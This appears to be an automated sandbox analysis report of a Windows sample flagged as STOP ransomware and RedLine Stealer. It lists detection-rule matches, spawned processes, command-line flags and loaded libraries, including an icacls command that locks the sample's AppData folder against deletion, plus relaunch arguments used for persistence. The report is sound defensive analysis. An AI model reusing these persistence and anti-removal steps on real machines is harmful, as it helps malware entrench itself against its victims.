          Source: 00000006.00000002.2025120505.0000000004431000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000009.00000002.2156092371.000000000444D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000004.00000002.2012495232.00000000044A7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2241428739.00000000044D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 348, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2716, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 1896, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 5968, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2828, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2164, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 5524, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 4748, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 4144, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: mU2p71KMss.exe PID: 2616, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: mU2p71KMss.exe, 00000006.00000002.2024972997.000000000423E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: =.COM;.EXE;.BAT;.CMD;.VBpZ#
          Source: classification engine, Classification label: mal100.rans.troj.evad.winEXE@18/287@4/2
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,1_2_00411900
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Code function: 0_2_043887C6 CreateToolhelp32Snapshot,Module32First,0_2_043887C6
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,1_2_0040D240
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, File created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe, Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Admin, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsAutoStart, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsTask, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --ForNetRes, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsAutoStart, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsTask, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Task, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --AutoStart, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Service, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: X1P, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Admin, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: runas, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: x2Q, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: x*P, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: C:\Windows\, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: D:\Windows\, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: 7P, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: %username%, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: F:\, 1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Admin, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsAutoStart, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsTask, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --ForNetRes, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsAutoStart, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: IsTask, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Task, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --AutoStart, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Service, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: X1P, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: --Admin, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: runas, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: x2Q, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: x*P, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: C:\Windows\, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: D:\Windows\, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: 7P, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: %username%, 5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Command line argument: F:\, 5_2_00419F90
          Source: mU2p71KMss.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: mU2p71KMss.exe, String found in binary or memory: set-addPolicy
          Source: mU2p71KMss.exe, String found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, File read: C:\Users\user\Desktop\mU2p71KMss.exe
          Source: unknown, Process created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Process created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Process created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Process created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknown, Process created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe, Process created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
          Source: unknown, Process created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe, Process created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: unknown, Process created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe, Process created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: msimg32.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: taskschd.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: xmllite.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: slc.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: pcacli.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe, Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\icacls.exe, Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
